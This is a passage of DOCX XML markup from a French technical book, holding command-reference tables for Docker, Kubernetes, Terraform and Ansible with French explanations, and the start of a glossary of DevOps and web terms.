              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docker build -t app:1.0 .</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Construire une image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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docker run -p 8080:80 app:1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Lancer un conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docker logs -f ctn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suivre les journaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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docker exec -it ctn sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Ouvrir un shell dans le conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docker compose up -d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Démarrer une pile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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kubectl get pods -A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Lister les pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>kubectl describe pod p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Diagnostiquer un pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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kubectl logs -f p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Journaux d'un pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>kubectl rollout undo deploy/app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Revenir au déploiement précédent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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kubectl port-forward svc/app 8080:80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Accéder à un service localement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Terraform et Ansible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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>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Effet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>terraform init</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Initialiser le dossier et les providers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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terraform plan -out p.tfplan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Prévisualiser les changements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>terraform apply p.tfplan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Appliquer le plan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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terraform state list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Lister les ressources suivies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>terraform destroy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Détruire l'infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400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ansible all -m ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="500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Tester la connexion aux hôtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ansible-playbook site.yml --check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4006"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7F9"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ansible-playbook site.yml --limit web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5008"/>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Exécution ciblée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Annexe C — Glossaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Les définitions ci-dessous sont celles employées dans le volume. Elles privilégient l'usage pratique sur l'exhaustivité théorique.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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Terme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680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Définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Qualité d'un service utilisable par tous, y compris avec un lecteur d'écran, un clavier seul ou une vision réduite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Fichier produit par une chaîne de construction : image, archive, paquet, binaire.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blue/green</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déploiement de deux environnements identiques, la bascule du trafic servant de mise en production et de retour arrière.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Copie temporaire d'une donnée pour éviter de la recalculer ou de la retélécharger.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intégration continue (tests à chaque commit) et livraison ou déploiement continu (mise en production automatisée).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Isolation de processus partageant le noyau de l'hôte, avec système de fichiers et réseau propres.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CORS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Politique du navigateur autorisant ou refusant les requêtes inter-origines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Système qui traduit les noms de domaine en adresses IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
